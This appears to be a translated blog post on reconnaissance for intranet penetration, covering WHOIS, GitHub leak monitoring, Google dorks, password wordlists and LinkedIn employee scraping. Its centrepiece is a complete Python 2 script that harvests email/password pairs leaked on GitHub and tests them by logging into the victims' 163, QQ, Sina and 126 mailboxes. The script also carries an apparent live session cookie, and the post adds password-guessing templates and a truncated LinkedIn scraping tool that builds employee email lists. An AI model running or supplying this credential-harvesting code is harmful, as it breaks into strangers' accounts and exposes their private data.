Intranet Penetration Series: A Summary of Information-Gathering Methods (2)

Posted by 思源湖的鱼


Preface

I have already summarized some methods in earlier posts:

This post complements those two earlier ones; it mainly summarizes information-gathering methods used while still trying to get into the intranet (i.e., it leans toward the pre-penetration phase).

I. Open-Source Intelligence (OSINT)

1. whois / reverse lookup / related assets
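At its core, a raw WHOIS lookup is just a line of text sent to the registry's WHOIS server on TCP port 43; reverse whois and related-asset discovery then pivot on the registrant email, name servers, and IP ranges it returns. A minimal sketch of the raw query (Python 3; the server and domain below are only examples):

# -*- coding: utf-8 -*-
# Minimal raw WHOIS query over TCP port 43 (Python 3); server/domain are examples
import socket

def whois_query(domain, server="whois.verisign-grs.com"):
    # The protocol is simply: send "<domain>\r\n", then read until the server closes
    s = socket.create_connection((server, 43), timeout=10)
    s.sendall((domain + "\r\n").encode())
    response = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        response += chunk
    s.close()
    return response.decode(errors="ignore")

if __name__ == "__main__":
    print(whois_query("example.com"))

In practice the whois command-line tool and online reverse-lookup / related-asset services are more convenient; the point is that all of them work from the same public registration data.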

2. GitHub sensitive information

(1) Scraping GitHub for email/password credentials

Scrapes email/password pairs from GitHub search results and verifies them by logging in over SMTP; based on Python 2.
Usage: python Nuggests.py 100 (100 is the number of search pages to scan; 100 pages at most)

Mail_Modules.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import smtplib
"""支持126,qq,sina,163邮箱"""
def maillogin_163(username,password,url):
    smtp_host = "smtp.163.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 163mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_qq(username,password,url):
    smtp_host = "smtp.qq.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading qq mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_sina(username,password,url):
    smtp_host = "smtp.sina.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading Sina mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass
def maillogin_126(username,password,url):
    smtp_host = "smtp.126.com"
    smtp_port = "25"
    smtp_user = username
    smtp_pass = password
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host,smtp_port)
        smtp.login(smtp_user,smtp_pass)
        print 'Analysis :' + url
        print 'Loading 126 mail Module'
        print smtp_user+':'+smtp_pass+'  Login OK!'
    except Exception:
        pass

Nuggests.py

#!/usr/bin/env python 
# -*- coding: utf-8 -*-

import requests,sys
from bs4 import BeautifulSoup
from Mail_Modules import maillogin_163,maillogin_qq,maillogin_sina,maillogin_126
global urllist
urllist = []

def mailfilter(list,mod):
    usern = ''
    password =''
    for url in list:
        try:
            page = requests.get(url).content

            page = page.split()

            for index in range(len(page)):
                if 'user' in page[index]:
                    usern = page[index+2].strip(',').replace("'","")
                #print user
                if 'pass' in page[index]:
                    password = page[index+2].strip(',').replace("'","")
                #print password
        except:
            pass
        if mod == '163':
            maillogin_163(usern,password,url)
        if mod == 'qq':
            maillogin_qq(usern,password,url)
        if mod == 'sina':
            maillogin_sina(usern,password,url)
        if mod == '126':
            maillogin_126(usern,password,url)

def read_page(keyword,pages):
    pages = int(pages)
    print 'Search Keyword : '+keyword
    print 'Scanning '+str(pages)+' pages from Github!'
    for page in range(pages):
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 115Browser/7.2.5'}
        cookie = {"Cookie":"_octo=GH1.1.1911767667.1480641870; logged_in=yes; dotcom_user=menu88; _ga=GA1.2.1291948085.1480641870; tz=Asia%2FShanghai; _gh_sess=eyJzZXNzaW9uX2lkIjoiNWY4YTVkMTk3YzRhNzg3ZWEwYjM5OWUwZWNhNDY2ZWIiLCJjb250ZXh0IjoiLyIsInNweV9yZXBvIjoibWVudTg4L215cHVibGljIiwic3B5X3JlcG9fYXQiOjE0ODEyNDY5NDN9--170066295059ff1fc3d8b46b50d3c62847ac82eb; user_session=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX; __Host-user_session_same_site=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX"} # replace with your own GitHub cookie
        url = 'https://github.com/search?l=php&p='+str(page)+'&q='+keyword+'&type=Code&utf8=%E2%9C%93'
        print 'Fetching page '+str(page)+'!'
        pagecon = requests.get(url,headers = headers,cookies = cookie).content
        soup = BeautifulSoup(pagecon,"html.parser")
        for link in soup.find_all('a'):
            url = link.get('href')
            if 'blob' in url:
                url = url.split('#')[0]
                url = url.split('blob/')[0]+url.split('blob/')[1]
                urllist.append('https://raw.githubusercontent.com'+url)
pages = int(sys.argv[1]) if len(sys.argv) > 1 else 5  # page count from the command line (see usage above); defaults to 5
read_page('smtp+163.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'163')
urllist =[]
read_page('smtp+qq.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'qq')
urllist =[]
read_page('smtp+sina.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'sina')
urllist =[]
read_page('smtp+126.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'126')

(2) GSIL

Written by 止介: https://github.com/FeeiCN/GSIL
Near-real-time (every 15 minutes) monitoring of GitHub for sensitive-information leaks, with alert notifications; based on Python 3.

(3) x-patrol

From Xiaomi Security: https://github.com/MiSecurity/x-patrol

More complete than the previous two; written in Go.
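All three tools boil down to the same idea: periodically query GitHub's code search for company-specific keywords (mail domains, internal host names, and so on), diff against what has already been seen, and alert on anything new. A minimal sketch of that core loop (Python 3; the token and keyword are placeholders, and a real monitor adds rules, de-duplication, and notification):

# -*- coding: utf-8 -*-
# Minimal GitHub code-search polling sketch (Python 3); TOKEN and KEYWORD are placeholders
import requests

TOKEN = "ghp_xxxxxxxx"        # a GitHub personal access token (code search requires auth)
KEYWORD = "corp.example.com"  # e.g. the target's mail or VPN domain

def search_code(keyword, page=1):
    url = "https://api.github.com/search/code"
    headers = {"Authorization": "token " + TOKEN,
               "Accept": "application/vnd.github.v3+json"}
    params = {"q": keyword, "per_page": 30, "page": page}
    r = requests.get(url, headers=headers, params=params, timeout=15)
    r.raise_for_status()
    return r.json().get("items", [])

if __name__ == "__main__":
    for item in search_code(KEYWORD):
        # html_url points at the matching file; a monitor would remember
        # seen URLs and alert only on new hits
        print(item["repository"]["full_name"], item["html_url"])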

3. Google hacking

See the earlier post: Google Hack Methods Summary.
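A few typical queries, for example (example.com stands for the target's domain):

site:example.com filetype:xls OR filetype:xlsx intext:password
site:example.com inurl:login
site:example.com intitle:"index of"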

II. Corporate Password Dictionaries

1. Dictionary lists

Some dictionaries on GitHub:

Templates targeting a specific company:

['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
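In these templates %user% and %pwd% stand for the account name and a base/known password; a minimal sketch (Python 3) of expanding them into a concrete candidate list:

# -*- coding: utf-8 -*-
# Expand %user%/%pwd% templates into concrete password candidates (Python 3)
templates = ['%pwd%123', '%user%123', '%user%2017', '%pwd%123!@#', '%user%!@#456']

def expand(user, base_pwd, tpls):
    out = set()
    for t in tpls:
        out.add(t.replace('%user%', user).replace('%pwd%', base_pwd))
    return sorted(out)

if __name__ == "__main__":
    for candidate in expand("zhangsan", "admin", templates):
        print(candidate)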

2. Password generation

(1) genpAss

A weak-password generator tailored to Chinese user habits; it builds candidate passwords from personal information.
The original author has deleted the repo; a mirror: https://github.com/test98123456/genpAss
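A minimal sketch of the same idea (Python 3, illustrative only, not genpAss's actual rules): permute fragments of personal information and append common suffixes:

# -*- coding: utf-8 -*-
# Illustrative personal-info-based weak-password generator (Python 3); not genpAss itself
from itertools import permutations

info = {"name": "zhangsan", "short": "zs", "birth": "1990", "phone_tail": "8888"}  # example data
suffixes = ["", "123", "@123", "!", "666"]

def gen(info, suffixes):
    parts = [info["name"], info["short"], info["birth"], info["phone_tail"]]
    cands = set()
    for a, b in permutations(parts, 2):   # ordered pairs of distinct fragments
        for s in suffixes:
            cands.add(a + b + s)
    return sorted(cands)

if __name__ == "__main__":
    words = gen(info, suffixes)
    print(len(words), "candidates, e.g.", words[:5])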

(2) passmaker

https://github.com/bit4woo/passmaker
Generates password dictionaries by combining pieces according to custom rules; mainly aimed at enterprise targets; based on Python 2.

(3) pydictor

https://github.com/LandGrey/pydictor
A powerful tool that can generate all kinds of wordlists.

III. Gathering Information from Public Data Sources

1. LinkedInt

https://github.com/mdsecactivebreach/LinkedInt

Usage (interactive session):

Providing you with Linkedin Intelligence
Author: Vincent Yiu (@vysec, @vysecurity)
Original version by @DisK0nn3cT
[*] Enter search Keywords (use quotes for more percise results)
"General Motors"

[*] Enter filename for output (exclude file extension)
generalmotors

[*] Filter by Company? (Y/N):
Y

[*] Specify a Company ID (Provide ID or leave blank to automate):


[*] Enter e-mail domain suffix (eg. contoso.com):
gm.com

[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast):
auto

[*] Automaticly using Hunter IO to determine best Prefix
[!] {first}.{last}
[+] Found first.last prefix
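The prefix option controls how each employee's name is turned into a candidate mailbox at the given domain. Roughly, it amounts to something like the following (illustrative Python 3 sketch; only a few unambiguous patterns are shown, and LinkedInt's own option names may map slightly differently):

# -*- coding: utf-8 -*-
# Build a candidate e-mail address from a name and a naming pattern (Python 3, illustrative)
def make_email(first, last, domain, pattern="first.last"):
    first, last = first.lower(), last.lower()
    patterns = {
        "first.last": first + "." + last,   # john.smith@gm.com
        "firstlast":  first + last,         # johnsmith@gm.com
        "flast":      first[0] + last,      # jsmith@gm.com
    }
    return patterns[pattern] + "@" + domain

if __name__ == "__main__":
    for p in ("first.last", "firstlast", "flast"):
        print(make_email("John", "Smith", "gm.com", p))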

Source code (excerpt; the listing below is truncated):

#!/usr/bin/python
# LinkedInt
# Scrapes LinkedIn without using LinkedIn API
# Original scraper by @DisK0nn3cT (https://github.com/DisK0nn3cT/linkedin-gatherer)
# Modified by @vysecurity
# - Additions:
# --- UI Updates
# --- Constrain to company filters
# --- Addition of Hunter for e-mail prediction

import socket
import sys
import re
import time
import requests
import subprocess
import json
import argparse
import smtplib
import dns.resolver
import cookielib
import os
import urllib
import math
import urllib2
import string
from bs4 import BeautifulSoup
from thready import threaded

reload(sys)
sys.setdefaultencoding('utf-8')

""" Setup Argument Parameters """
parser = argparse.ArgumentParser(description='Discovery LinkedIn')
parser.add_argument('-u', '--keywords', help='Keywords to search')
parser.add_argument('-o', '--output', help='Output file (do not include extentions)')
args = parser.parse_args()
api_key = "" # Hunter API key
username = "" 	# enter username here
password = ""	# enter password here

if api_key == "" or username == "" or password == "":
        print "[!] Oops, you did not enter your api_key, username, or password in LinkedInt.py"
        sys.exit(0)

def login():
	cookie_filename = "cookies.txt"
	cookiejar = cookielib.MozillaCookieJar(cookie_filename)
	opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),urllib2.HTTPHandler(debuglevel=0),urllib2.HTTPSHandler(debuglevel=0),urllib2.HTTPCookieProcessor(cookiejar))
	page = loadPage(opener, "https://www.linkedin.com/")
	parse = BeautifulSoup(page, "html.parser")

	csrf = parse.find(id="loginCsrfParam-login")['value']
	
	login_data = urllib.urlencode({'session_key': username, 'session_password': password, 'loginCsrfParam': csrf})
	page = loadPage(opener,"https://www.linkedin.com/uas/login-submit", login_data)
	
	parse = BeautifulSoup(page, "html.parser")
	cookie = ""
	
	try:
		cookie = cookiejar._cookies['.www.linkedin.com']['/']['li_at'].value
	except:
		sys.exit(0)
	
	cookiejar.save()
	os.remove(cookie_filename)
	return cookie

def loadPage(client, url, data=None):
	try:
		response = client.open(url)
	except:
		print "[!] Cannot load main LinkedIn page"
	try:
		if data is not None:
			response = client.open(url, data)
		else:
			response = client.open(url)
		return ''.join(response.readlines())
	except:
		sys.exit(0)

def get_search():

    body = ""
    csv = []
    css = """<style>
    #employees {
        font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
        border-collapse: collapse;
        width: 100%;
    }
    #employees td, #employees th {
        border: 1px solid #ddd;
        padding: 8px;
    }
    #employees tr:nth-child(even){background-color: #f2f2f2;}
    #employees tr:hover {background-color: #ddd;}
    #employees th {
        padding-top: 12px;
        padding-bottom: 12px;
        text-align: left;
        background-color: #4CAF50;
        color: white;
    }
    </style>
    """

    header = """<center><table id=\\"employees\\">
             <tr>
             <th>Photo</th>
             <th>Name</th>
             <th>Possible Email:</th>
             <th>Job</th>
             <th>Location</th>
             </tr>
             """

    # Do we want to automatically get the company ID?


    if bCompany:
	    if bAuto:
	        # Automatic
	        # Grab from the URL 
	        companyID = 0
	        url = "https://www.linkedin.com/voyager/api/typeahead/hits?q=blended&query=%s" % search
	        headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
	        cookies['JSESSIONID'] = 'ajax:0397788525211216808'
	        r = requests.get(url, cookies=cookies, headers=headers)
	        content = json.loads(r.text)
	        firstID = 0
	        for i in range(0,len(content['elements'])):
	        	try:
	        		companyID = content['elements'][i]['hitInfo']['com.linkedin.voyager.typeahead.TypeaheadCompany']['id']
	        		if firstID == 0:
	        			firstID = companyID
	        		print "[Notice] Found company ID: %s" % companyID
	        	except:
	        		continue
	        companyID = firstID
	        if companyID == 0:
	        	print "[WARNING] No valid company ID found in auto, please restart and find your own"
	    else:
	        # Don't auto, use the specified ID
	        companyID = bSpecific

	    print
	    
	    print "[*] Using company ID: %s" % companyID

	# Fetch the initial page to get results/page counts
    if bCompany == False:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=0" % search
    else:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=0" % (companyID)
    
    print url
    
    headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
    cookies['JSESSIONID'] = 'ajax:0397788525211216808'
    #print url
    r = requests.get(url, cookies=cookies, headers=headers)
    content = json.loads(r.text)
    data_total = content['elements'][0]['total']

    # Calculate pages off final results at 40 results/page
    pages = data_total / 40

    if pages == 0:
    	pages = 1

    if data_total % 40 == 0:
        # Becuase we count 0... Subtract a page if there are no left over results on the last page
        pages = pages - 1 

    if pages == 0: 
    	print "[!] Try to use quotes in the search name"
    	sys.exit(0)
    
    print "[*] %i Results Found" % data_total
    if data_total > 1000:
        pages = 25
        print "[*] LinkedIn only allows 1000 results. Refine keywords to capture all data"
    print "[*] Fetching %i Pages" % pages
    print

    for p in range(pages):
        # Request results for each page using the start offset
        if bCompany == False:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=%i" % (search, p*40)
        else:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=%i" % (companyID, p*40)
        #print url
        r = requests.get(url, cookies=cookies, headers=headers)
        content = r.text.encode('UTF-8')
        content = json.loads(content)
        print "[*] Fetching page %i with %i results" % ((p),len(content['elements'][0]['elements']))
        for c in content['elements'][0]['elements']:
            if 'com.linkedin.voyager.search.SearchProfile' in c['hitInfo'] and c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['headless'] == False:
                try:
                    data_industry = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['industry']
                except:
                    data_industry = ""    
                data_firstname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['firstName']
                data_lastname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['lastName']
                data_slug = "https://www.linkedin.com/in/%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['publicIdentifier']
                data_occupation = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['occupation']
                data_location